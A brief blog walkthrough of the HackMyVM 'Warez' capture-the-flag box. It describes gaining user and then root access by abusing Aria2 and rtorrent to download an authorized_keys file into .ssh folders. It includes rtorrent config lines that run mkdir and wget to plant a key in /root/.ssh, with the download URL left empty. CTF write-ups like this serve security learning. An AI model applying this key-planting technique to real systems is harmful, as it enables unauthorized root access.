Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Warez Simple Walkthrough

HackMyVm Warez Simple Walkthrough

Two key steps.

First step, use Aria2 WebUI to download authorzied_keys into /home/carolina/.ssh, then we can login ssh as user carolina.


Second step, use rtorrent to download authorzied_keys again into /root/.ssh.

 carolina@warez:~$ tail .rtorrent.rc 
 # SCGI Connectivity (for alternative rtorrent interfaces, XMLRPC)
 # Use a IP socket with scgi_port, or a Unix socket with scgi_local.
 # schedule can be used to set permissions on the unix socket.
 #network.scgi.open_port = ""
 #network.scgi.open_local = (cat,(session.path),/rpc.sock)
 #schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
 execute.throw = mkdir,/root/.ssh
 execute.throw = wget,,-O,/root/.ssh/authorized_keys



Powered By Z-BlogPHP 1.7.0